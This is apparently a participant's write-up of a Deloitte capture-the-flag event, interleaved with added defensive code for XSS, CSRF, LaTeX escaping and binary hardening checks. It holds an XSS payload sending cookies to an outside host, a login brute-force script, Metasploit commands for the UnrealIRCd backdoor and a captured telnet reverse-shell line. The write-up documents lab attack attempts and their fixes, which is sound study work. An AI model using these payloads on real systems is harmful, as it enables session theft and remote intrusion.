Results of Deloitte CTF

Tools used are Burp 2.1.03, sqlmap de632388971b8c1ad54c9ee37885d679885e0657, Python 3, Metasploit 5.0.42+20190819102518~1rapid7-1, Nessus, gdb, valgrind and hardening-check (from Debian package devscripts).

Raccoon coin

Noticed the following message in the support section: “We have looked at your message from a secure non-internet connected system via http://localhost/get_message?id=e761f860fd044c0f3543f65ce2e09ef0 However due to the high demand for Raccoon Coins we cannot respond.”

Maybe session cookies are used, or something else is executed when the admin visits the message. Tried a Burp active scan of the parameters in /challenge/fc2fc6ee458fc64442976a4b75861f1c/send_message?to=test&message=test&action=Send, followed by the chained requests GET /support and GET /get_message?id=<latest id here>, and found that the application has a cross-site scripting vulnerability when a message is read through get_message.

Tried:

    '"><script type="text/javascript">document.location='https://hsalo.nerv.fi/foo.php?c='+document.cookie;</script>

Noticed that the cookie is HttpOnly. The Secure flag is not set, so it will also be sent over http://. Injected BeEF (The Browser Exploitation Framework) into my own message and confirmed that the injected JavaScript ran as expected. Sent the same malicious message to the admin user; nothing happened.

Tried Burp active scanner and sqlmap against all discovered parameters, both logged in and without a session.

The login form reveals whether the username is correct and whether the password is incorrect. Tried brute force with the script raccoon-brute.py. This is probably not the intended task in this challenge, as there is a time limit. Python test code below:

    import requests
    import itertools
    import hashlib
    import sys

    # Candidate alphabet: lowercase letters and digits.
    chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
             'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
             '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
    username = 'admin'

    def do_md5hash(keyword):
        # The login form submits the MD5 of the password, not the cleartext.
        return hashlib.md5(keyword.encode()).hexdigest()

    def do_query(username, password, hashed_pass):
        print('[*] Pass / hash: %s / %s' % (password, hashed_pass))
        r = requests.post('https://portal.hackazon.org/challenge/19585893949dc42d0fbae1b3bb79b330/login',
                          data={'name': username, 'password': hashed_pass, 'action': 'Login'})
        if r.status_code != 200:
            print('[!] Something failed and did not receive 200 status code')
        if r.text == "Invalid password":
            print('[*] invalid')
        else:
            print("[!] VALID PASSWORD: %s" % password)
            sys.exit()

    if __name__ == "__main__":
        # Every 4-character combination of the alphabet, in order.
        for cleartext_pass in [''.join(i) for i in itertools.product(chars, repeat=4)]:
            hashed_pass = do_md5hash(cleartext_pass)
            do_query(username, cleartext_pass, hashed_pass)

Noticed that the support message functionality is affected by a CSRF vulnerability.
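As an added example (not code from the original writeup or from the challenge), this is the server-side shape that would close the two findings above: the stored message is escaped before it is placed into HTML, and send_message refuses any request that does not carry a token bound to the caller's session. The endpoint handling, the session id and the secret are assumptions for the demo.

```python
import hashlib
import hmac
import html

# Constructed secret for the demo; a real deployment loads it from configuration.
SERVER_SECRET = b"constructed-demo-secret"


def render_message(message):
    """Escape a stored support message before it is placed into HTML.

    get_message reflected the message unescaped, so '"><script>...' became live
    markup. With quote=True the characters that can end an attribute or start a
    tag become entities, so the text is displayed rather than executed.
    """
    return '<div class="message">%s</div>' % html.escape(message, quote=True)


def make_csrf_token(session_id):
    """Token bound to the session: HMAC-SHA256(secret, session id).

    send_message accepted any POST carrying the victim's cookie. A cross-origin
    page can make the browser send the cookie, but it cannot compute this value,
    so requiring it in the form body stops the forged submission.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf_token(session_id, submitted):
    # Constant-time comparison; a missing token is treated as the empty string.
    return hmac.compare_digest(make_csrf_token(session_id), submitted or "")


def handle_send_message(session_id, form):
    """Server side of send_message (assumed handler): reject unless the token matches."""
    if not check_csrf_token(session_id, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    return 200, render_message(form.get("message", ""))


def session_cookie_header(session_value):
    """Set-Cookie line with the flags noted above: HttpOnly was present, Secure was not."""
    return "Set-Cookie: session=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % session_value


if __name__ == "__main__":
    sid = "constructed-session-id"
    print(render_message('"><script>alert(1)</script>'))
    print(handle_send_message(sid, {"to": "admin", "message": "hi"}))           # 403
    print(handle_send_message(sid, {"to": "admin", "message": "hi",
                                    "csrf_token": make_csrf_token(sid)}))       # 200
    print(session_cookie_header("opaque-value"))
```

The token has to be carried in the form body (or a custom header), never only in a cookie, because the cookie is exactly what the browser attaches on the attacker's behalf; SameSite=Lax on the session cookie is a second, independent line of defence for the same problem.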

Analyzed the session tokens: logged in 20000 times and found only 709 unique “session” cookies. Definitely something to research more.

Tested signing up as admin, which failed with “Cannot signup as admin”, and signing up with the same details as previously, which gave “Error user already exists”.

What is the generated password? It looks random. Maybe there are issues with the MD5 library or the random components.

Edit:

  • 2019-08-29: Logged in 20k times, collected the session tokens, checked /index with each session token and could only find my own account. Old sessions are not invalidated when a user logs in multiple times.
  • 2019-09-01: A new Set-Cookie is always given when fetching e.g. /index. The middle part of the token, e.g. (.EE0r6Q.), is incrementing, but I can’t figure out whether there is some logic to the full token.
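
The three-part, dot-separated token with an incrementing middle part described in the note above matches the layout of itsdangerous-signed cookies (the format Flask uses for its session cookie): payload, base64 timestamp, signature. The script below is an added example, not part of the original writeup; it assumes that layout and the pre-2.0 itsdangerous epoch, decodes the quoted fragment `.EE0r6Q.`, and uses a constructed secret together with a simplified HMAC signer to show why many logins within the same second can yield the same cookie value.

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Epoch used by itsdangerous < 2.0 (2011-01-01T00:00:00Z): the timestamp field is
# seconds since this epoch, big-endian, urlsafe-base64 without padding (assumption).
ITSDANGEROUS_EPOCH = 1293840000

# Constructed signing key for the demo; the real server's key is unknown.
DEMO_SECRET = b"constructed-demo-secret"


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_timestamp(unix_secs):
    n = unix_secs - ITSDANGEROUS_EPOCH
    return _b64e(n.to_bytes((n.bit_length() + 7) // 8, "big"))


def split_cookie(cookie):
    """Split '<payload>.<timestamp>.<signature>'. The payload may itself start with
    '.' (that marks a compressed payload), so split from the right."""
    parts = cookie.rsplit(".", 2)
    if len(parts) != 3:
        raise ValueError("not a three-part signed cookie")
    return parts


def cookie_timestamp(cookie):
    """Return the UTC datetime encoded in the middle part of the cookie."""
    _, ts, _ = split_cookie(cookie)
    secs = int.from_bytes(_b64d(ts), "big") + ITSDANGEROUS_EPOCH
    return datetime.fromtimestamp(secs, tz=timezone.utc)


def sign(payload_and_ts, secret=DEMO_SECRET):
    """Simplified stand-in for the real signer: HMAC-SHA1 over 'payload.timestamp'
    with a key derived as HMAC-SHA1(secret, salt). Only the structure matters here."""
    key = hmac.new(secret, b"cookie-session", hashlib.sha1).digest()
    return _b64e(hmac.new(key, payload_and_ts.encode(), hashlib.sha1).digest())


def make_cookie(session, unix_secs, secret=DEMO_SECRET):
    payload = _b64e(json.dumps(session, separators=(",", ":")).encode())
    body = payload + "." + encode_timestamp(unix_secs)
    return body + "." + sign(body, secret)


def verify_cookie(cookie, secret=DEMO_SECRET):
    payload, ts, sig = split_cookie(cookie)
    return hmac.compare_digest(sign(payload + "." + ts, secret), sig)


def summarize(cookies):
    """Explain an observation like '20000 logins, 709 unique cookies': the value
    only changes when the signed payload or the second-resolution timestamp does."""
    payloads = {split_cookie(c)[0] for c in cookies}
    stamps = {split_cookie(c)[1] for c in cookies}
    return {"cookies": len(cookies), "unique_cookies": len(set(cookies)),
            "unique_payloads": len(payloads), "unique_timestamps": len(stamps)}


if __name__ == "__main__":
    # The middle part quoted in the note above decodes to a time on 2019-09-01,
    # the day of the note (the surrounding parts here are placeholders).
    print(cookie_timestamp("x.EE0r6Q.y"))
    # Constructed batch: 10 logins of one account spread over 4 distinct seconds.
    batch = [make_cookie({"user": "hsalo"}, 1567332969 + i // 3) for i in range(10)]
    print(summarize(batch))
```

The point for the token analysis is that the cookie is not a random session identifier at all: the first part is the (readable) session payload, the middle part is a clock, and only the signature depends on the server secret, so the number of unique values is bounded by the number of distinct (payload, second) pairs rather than by any entropy in a generator.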

Defender has PARTed us

There seems to be an IRC server running:

    hsalo@deloitte:~$ nmap -P0 -sV 10.6.0.2 -p0-
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 19:28 EEST
    Nmap scan report for 10.6.0.2
    Host is up (0.11s latency).
    Not shown: 65534 closed ports
    PORT      STATE SERVICE VERSION
    6667/tcp  open  irc     UnrealIRCd
    11111/tcp open  irc     UnrealIRCd
    Service Info: Host: irc.cerulean.cave
    

Joined the IRC and it seems to be a normal server running old versions:

    13:56 !irc.cerulean.cave *** Looking up your hostname...
    13:56 !irc.cerulean.cave *** Couldn't resolve your hostname; using your IP address instead
    13:56 -!- Capabilities requested: multi-prefix
    13:56 -!- Capabilities supported: account-notify away-notify multi-prefix userhost-in-names
    13:56 -!- Capabilities acknowledged: multi-prefix
    13:56 -!- Welcome to the Cerulean Cave IRC Network hsalo!hsalo@10.6.0.100
    13:56 -!- Your host is irc.cerulean.cave, running version Unreal3.2.10.4
    13:56 -!- This server was created Thu May 24 2018 at 09:53:36 UTC
    13:56 -!- irc.cerulean.cave Unreal3.2.10.4 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
    13:56 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are
              supported by this server
    13:56 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=Cerulean-Cave
              CASEMAPPING=ascii EXTBAN=~,qjncrRa ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
    13:56 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS are supported by this server
    13:56 -!- There are 1 users and 2 invisible on 2 servers
    13:56 -!- 2 operator(s) online
    13:56 -!- 2 channels formed
    13:56 -!- I have 2 clients and 1 servers
    13:56 -!- 2 2 Current local users 2, max 2
    13:56 -!- 3 3 Current global users 3, max 3
    13:56 -!- MOTD File is missing
    13:56 -!- Mode change [+iwx] for user hsalo
    13:56 Defender [Defender@cerulean.cave] requested CTCP VERSION from hsalo:
    

Ash in IRC gives a tip:

    19:32 <@Ash> Hm, I don't trust these newcomers, let's check the status
    19:32 <@Ash> status
    19:32 <@Ash> Luckily I keep my secrets safely stored in File PO04
    19:32 <@Defender> IRC Defender Status
    19:32 <@Defender> 0 clients have been killed, from a total of 2 total connections.
    19:32 <@Defender> Uptime: 8 mins, 6 secs.
    19:32 <@Defender> Loaded modules: fyle, cgiirc, regexp_akill, version, conn_average, server
    19:32 <@Defender> Features provided: core-v1, server, unreal-server, native-gline, native-globops, fyle, cgiirc, regexp_akill, version, conn_average
    19:33 <@Ash> Doduo, I choose you! The legend rolls on.
    

Tried to talk with Ash in private, but it seems he is not a people person. Tried DCC chat and did not receive a response.

Can’t create own channels. Can’t join channels other than #cave, e.g. not able to join #opers. Didn’t find other hosts on the network than .1, .2 and my own .100.

Expected CVE-2010-2075, the backdoor that was added to the UnrealIRCd 3.2.8.1 mirror packages and allows remote users to execute arbitrary commands (note that the banner above reports Unreal3.2.10.4, a later release). Tried to exploit this with Metasploit without success.

    root@metasploit:# /opt/metasploit-framework/bin/msfupdate
    root@metasploit:# /opt/metasploit-framework/bin/msfconsole
    use exploit/unix/irc/unreal_ircd_3281_backdoor
    set RHOSTS 10.6.0.2
    set LHOST 10.6.0.100
    set RPORT 6667
    set LPORT 4444
    run
    

Noticed in Wireshark that the exploit is sent before the normal IRC connection handshake is completed. Modified the script (timeouts etc.) and also tried to send the payload using my own Python code, without success.

    :irc.cerulean.cave NOTICE AUTH :*** Looking up your hostname...
    AB;sh -c '(sleep 4402|telnet 10.6.0.100 4444|while : ; do sh && break; done 2>&1|telnet 10.6.0.100 4444 >/dev/null 2>&1 &)'
    :irc.cerulean.cave NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :irc.cerulean.cave 451 AB;sh :You have not registered
    

Port 11111 is for servers only:

    14:19 -!- Irssi: Connecting to 10.6.0.2 [10.6.0.2] port 11111
    14:19 -!- Irssi: Connection to 10.6.0.2 established
    14:19 -!- Capabilities requested: multi-prefix
    14:19 -!- Capabilities supported: account-notify away-notify multi-prefix userhost-in-names
    14:19 -!- ERROR Closing Link: hsalo[10.6.0.100] (This port is for servers only)
    14:19 -!- Irssi: Connection lost to 10.6.0.2
    

Tested CVE-2010-2075 against port 11111, but no success. Tested server linking, but it does not work:

    14:53 [127] !irc.foonet.com *** Connecting to irc.cerulean.cave[10.6.0.2].
    14:53 [127] !irc.foonet.com ERROR from irc.cerulean.cave[10.6.0.2] -- Link denied (No matching link configuration) [@10.6.0.100.46552]
    14:53 [127] !irc.foonet.com ERROR from irc.cerulean.cave[10.6.0.2] -- Closing Link: [10.6.0.100] (Link denied (No matching link configuration))
    14:53 [127] !irc.foonet.com Lost connection to irc.cerulean.cave[10.6.0.2]: Read error
    

Tested the approach from https://nmap.org/nsedoc/scripts/irc-sasl-brute.html, but SASL doesn’t seem to be enabled.

Tested an ARP spoofing MitM attack, which didn’t seem to work over the VPN. Also tested using the same IP as the IRC server, but that didn’t cause any other issues than my own connection not working properly, as expected. Did not test VPN server exploits as that is (probably) not in scope.

Checked for issues with Nessus. Nothing interesting found.

Found out that IRC Defender also has some vulnerability, but I was unable to find more information about it yet (links not working and the IRC-Security mailing list has been end-of-life for some time now). Maybe something to look for in the source code.

Santasales

General notes

Found a cross-site scripting vulnerability in “/challenge/1dcef6e867f46463660adfd4d4adc55f/voucher?id=”, which can be reproduced with the proof-of-concept: https://portal.hackazon.org/challenge/1dcef6e867f46463660adfd4d4adc55f/voucher?id=731%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E

Flag 1

Task is: “SantaSales issued a great voucher code for another visitor… can you find which one it was?”

Found another voucher by exploiting an insecure direct object reference (IDOR) in the “id” parameter of “GET /challenge/1715df6ecdb606a849a80687ead5d41a/voucher?id=731”.

Flag 2

Task is: “The voucher issuing system seems to be made out of rubber. Can you help the Grinch find the vulnerability?”

My first suspicion is that the generated PDF file contains the name “Henri” taken from the GET query “/challenge/1dcef6e867f46463660adfd4d4adc55f/download?id=731&name=Henri&email=henri%40nerv.fi&download=Download”, and that the PDF is produced by pdfTeX (“/PTEX.Fullbanner (This is pdfTeX, Version 3.14159265-2.6-1.40.16 (TeX Live 2015/Debian) kpathsea version 6.2.1)”), which means there might be LaTeX injection vulnerabilities in the rendering. I have seen a similar case in an exercise and in real life.

Iterating and trying to find LaTeX vulnerabilities:

With multiple different kinds of inputs I’m seeing “Rendering timeout or failure.” Might be a blacklist.

Generated malicious payloads, sent them to the Elasticsearch instance from Burp, downloaded all the PDF files and tried to find the issue, without success.
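An added example, not from the writeup or from the challenge's own generator: the input handling a voucher renderer should have when a user-supplied name and e-mail end up inside pdfTeX source. A denylist of dangerous macros (the "blacklist" suspected above) has to anticipate every spelling; validating against an allowlist and then escaping TeX's special characters does not. The field names, the template and the allowed character sets are assumptions for the demo.

```python
import re

# Characters that have meaning to TeX in document text, with the replacement
# that prints them literally.
LATEX_ESCAPES = {
    "\\": r"\textbackslash{}",
    "{": r"\{",
    "}": r"\}",
    "$": r"\$",
    "&": r"\&",
    "#": r"\#",
    "^": r"\textasciicircum{}",
    "_": r"\_",
    "%": r"\%",
    "~": r"\textasciitilde{}",
}


def escape_latex(text):
    """Escape one character at a time, so a replacement that itself contains
    backslashes and braces is never rescanned and re-escaped."""
    return "".join(LATEX_ESCAPES.get(ch, ch) for ch in text)


# Allowlists for the two fields the voucher form takes (assumed shapes).
NAME_RE = re.compile(r"^[A-Za-z0-9 .'-]{1,64}$")
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_fields(name, email):
    """Return (ok, reason). Reject rather than filter: anything outside the
    allowed set is refused before it gets near the TeX source."""
    if not NAME_RE.match(name):
        return False, "name contains characters outside the allowed set"
    if not EMAIL_RE.match(email):
        return False, "email is not a plain address"
    return True, ""


# Constructed stand-in for the voucher document; the real template is unknown.
VOUCHER_TEMPLATE = r"""\documentclass{article}
\begin{document}
Voucher %(id)s issued to %(name)s (%(email)s).
\end{document}
"""


def render_voucher_source(voucher_id, name, email):
    """Build the .tex source: validate first, then escape what goes into the
    template anyway (the e-mail allowlist admits '%' and '_', which TeX would
    otherwise read as a comment start and a subscript)."""
    ok, reason = validate_fields(name, email)
    if not ok:
        raise ValueError(reason)
    return VOUCHER_TEMPLATE % {
        "id": int(voucher_id),
        "name": escape_latex(name),
        "email": escape_latex(email),
    }


if __name__ == "__main__":
    print(render_voucher_source(731, "Henri", "henri@nerv.fi"))
    print(escape_latex("50% off & more_stuff"))
    print(validate_fields("Henri\\x", "henri@nerv.fi"))
```

Escaping only covers what the template interpolates; the engine itself should additionally run with shell escape disabled (pdflatex -no-shell-escape) and with openin_any=p and openout_any=p in texmf.cnf so a job cannot read or write files outside its working directory, in a throwaway directory with a time limit.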

People have written writeups about this on the internet, e.g.:

Flag 3

Task is: “Santa’s elves built a text decoration tool… get access to the backend!”

I suspect a buffer overflow, but I wasn’t able to exploit it. I’m familiar with fuzzing but haven’t often been writing exploits for buffer overflows. The program lights.bin uses, for example, the C printf function, which is a common cause of vulnerabilities. I expect that after exploiting this vulnerability locally it would be possible to exploit it in the web service too, to reveal the secret flag.

    hsalo@deloitte:~$ hardening-check -R lights.bin
    lights.bin:
     Position Independent Executable: no, normal executable!
     Stack protected: no, not found!
     Fortify Source functions: no, only unprotected functions found!
     Read-only relocations: yes
     Immediate binding: no, not found!
     Stack clash protection: unknown, no -fstack-clash-protection instructions found
     Control flow integrity: unknown, no -fcf-protection instructions found!
    time
    __libc_start_main
    memcpy
    __gmon_start__
    localtime
    setbuf
    _ITM_registerTMCloneTable
    puts
    
    _Jv_RegisterClasses
    memset
    strcspn
    mktime
    _ITM_deregisterTMCloneTable
    printf
    fgets
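
Added example, not from the writeup: a small ELF64 reader in Python that reproduces the core hardening-check verdicts above (PIE, stack protector, fortify, RELRO, immediate binding) directly from the file's headers and dynamic symbol table, so the meaning of each line in that output can be seen in the structures it comes from. Since lights.bin itself is not reproduced here, the demo runs on a constructed minimal ELF image carrying the same import names as the output above; the fortify test is simplified to looking for *_chk symbols.

```python
import struct

# ELF constants needed for the checks (ELF64, little-endian only).
ET_DYN = 3                                  # e_type of a PIE (or shared object)
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
SHT_DYNSYM = 11
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def _dynamic_symbols(data, shdrs):
    """Names from .dynsym; st_name indexes the string table named by sh_link."""
    names = []
    for sh in shdrs:
        if sh["type"] != SHT_DYNSYM:
            continue
        strtab = shdrs[sh["link"]]
        strs = data[strtab["offset"]:strtab["offset"] + strtab["size"]]
        for off in range(sh["offset"], sh["offset"] + sh["size"], 24):
            st_name = struct.unpack_from("<I", data, off)[0]
            name = strs[st_name:strs.index(b"\0", st_name)].decode("ascii", "replace")
            if name:
                names.append(name)
    return names


def check_hardening(data):
    """Reproduce the core hardening-check findings from an ELF64 LE image in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian images are handled here")
    hdr = struct.unpack_from("<HHIQQQIHHHHHH", data, 16)
    e_type, e_phoff, e_shoff = hdr[0], hdr[4], hdr[5]
    e_phentsize, e_phnum, e_shentsize, e_shnum = hdr[8], hdr[9], hdr[10], hdr[11]
    relro = bind_now = False
    for i in range(e_phnum):
        p_type, _, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            "<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            relro = True                        # "Read-only relocations"
        elif p_type == PT_DYNAMIC:              # walk the dynamic section for BIND_NOW
            for off in range(p_offset, p_offset + p_filesz, 16):
                tag, val = struct.unpack_from("<qQ", data, off)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                    bind_now = True             # "Immediate binding"
    shdrs = []
    for i in range(e_shnum):
        s = struct.unpack_from("<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
        shdrs.append({"type": s[1], "offset": s[4], "size": s[5], "link": s[6]})
    syms = _dynamic_symbols(data, shdrs)
    return {
        "pie": e_type == ET_DYN,                            # "Position Independent Executable"
        "stack_protector": "__stack_chk_fail" in syms,      # "Stack protected"
        "fortify": any(s.endswith("_chk") for s in syms),   # simplified "Fortify Source"
        "relro": relro,
        "bind_now": bind_now,
        "imports": syms,
    }


def build_sample_elf(symbols, pie=False, relro=True, bind_now=False):
    """Constructed minimal ELF64 image (not lights.bin) with only the structures
    check_hardening() reads: PT_DYNAMIC (plus PT_GNU_RELRO), .dynsym and .dynstr."""
    dynstr = b"\0" + b"".join(s.encode() + b"\0" for s in symbols)
    dynsym, st_name = b"", 1
    for s in symbols:
        dynsym += struct.pack("<IBBHQQ", st_name, 0x12, 0, 0, 0, 0)  # GLOBAL FUNC, undefined
        st_name += len(s) + 1
    dyn = (struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW) if bind_now else b"") + struct.pack("<qQ", DT_NULL, 0)
    phnum = 2 if relro else 1
    dyn_off = 64 + phnum * 56
    str_off = dyn_off + len(dyn)
    sym_off = str_off + len(dynstr)
    shoff = sym_off + len(dynsym)
    phdrs = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, dyn_off, 0, 0, len(dyn), len(dyn), 8)
    if relro:
        phdrs += struct.pack("<IIQQQQQQ", PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1)
    shdrs = struct.pack("<IIQQQQIIQQ", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)                   # SHT_NULL
    shdrs += struct.pack("<IIQQQQIIQQ", 0, SHT_DYNSYM, 0, 0, sym_off, len(dynsym), 2, 0, 8, 24)
    shdrs += struct.pack("<IIQQQQIIQQ", 0, 3, 0, 0, str_off, len(dynstr), 0, 0, 1, 0)  # SHT_STRTAB
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
    header = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else 2, 62, 1, 0,
                                 64, shoff, 0, 64, 56, phnum, 64, 3, 0)
    return header + phdrs + dyn + dynstr + dynsym + shdrs


if __name__ == "__main__":
    # Imports from the hardening-check output above: no __stack_chk_fail and no
    # *_chk variants, so the "no" verdicts for lights.bin are reproduced.
    print(check_hardening(build_sample_elf(["printf", "fgets", "memcpy", "strcspn", "puts"])))
    print(check_hardening(build_sample_elf(["__printf_chk", "fgets", "__stack_chk_fail"],
                                           pie=True, bind_now=True)))
```

On a real file call check_hardening(open(path, "rb").read()). Each verdict maps to a build flag: -fstack-protector-strong (Stack protected), -D_FORTIFY_SOURCE=2 with optimisation enabled (Fortify Source), -fPIE -pie (Position Independent Executable), -Wl,-z,relro (Read-only relocations), -Wl,-z,now (Immediate binding), and -fstack-clash-protection and -fcf-protection for the last two lines of the output; a binary missing all of the first three, as lights.bin is, gives an overflow in a fgets/memcpy path nothing to stop it at the stack canary, no bounds check in the libc wrappers and a fixed load address.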
    

Image of the crash: